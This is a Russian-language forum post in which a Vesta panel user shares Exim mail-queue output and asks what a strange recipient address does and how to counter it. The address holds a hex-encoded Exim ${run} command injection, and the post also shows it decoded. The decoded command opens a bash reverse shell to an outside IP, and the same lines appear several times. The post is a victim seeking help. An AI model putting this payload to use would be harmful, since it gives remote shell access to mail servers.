We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
Эксплойт в адресе
-
- Posts: 8
- Joined: Sun Nov 20, 2016 9:45 am
Эксплойт в адресе
Что делать и как бороться?
[root@example ~]# exim -bp
26h 3.3K 1hlZYD-0008Me-MD <>
[email protected]
3h 2.2K 1hlvC1-0006R2-V5 <> *** frozen ***
root+${run{\x2Fbin\x2Fbash\t-c\t\x27\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x32\x30\x36\x2e\x31\x38\x39\x2e\x38\x33\x2e\x31\x34\x33\x2f\x35\x34\x37\x39\x32\x20\x30\x3e\x26\x31\x27}}@example.com
3h 2.2K 1hlvY6-0006pN-9U <> *** frozen ***
root+${run{\x2Fbin\x2Fbash\t-c\t\x27\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x32\x30\x36\x2e\x31\x38\x39\x2e\x38\x33\x2e\x31\x34\x33\x2f\x35\x34\x37\x39\x32\x20\x30\x3e\x26\x31\x27}}@example.com
Строка выглядит так (что оно делает?):
root+${run{/bin/bash\t-c\t'/bin/bash -i >& /dev/tcp/206.189.83.143/54792 0>&1'}}
[root@example ~]# exim -bp
26h 3.3K 1hlZYD-0008Me-MD <>
[email protected]
3h 2.2K 1hlvC1-0006R2-V5 <> *** frozen ***
root+${run{\x2Fbin\x2Fbash\t-c\t\x27\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x32\x30\x36\x2e\x31\x38\x39\x2e\x38\x33\x2e\x31\x34\x33\x2f\x35\x34\x37\x39\x32\x20\x30\x3e\x26\x31\x27}}@example.com
3h 2.2K 1hlvY6-0006pN-9U <> *** frozen ***
root+${run{\x2Fbin\x2Fbash\t-c\t\x27\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x32\x30\x36\x2e\x31\x38\x39\x2e\x38\x33\x2e\x31\x34\x33\x2f\x35\x34\x37\x39\x32\x20\x30\x3e\x26\x31\x27}}@example.com
Строка выглядит так (что оно делает?):
root+${run{/bin/bash\t-c\t'/bin/bash -i >& /dev/tcp/206.189.83.143/54792 0>&1'}}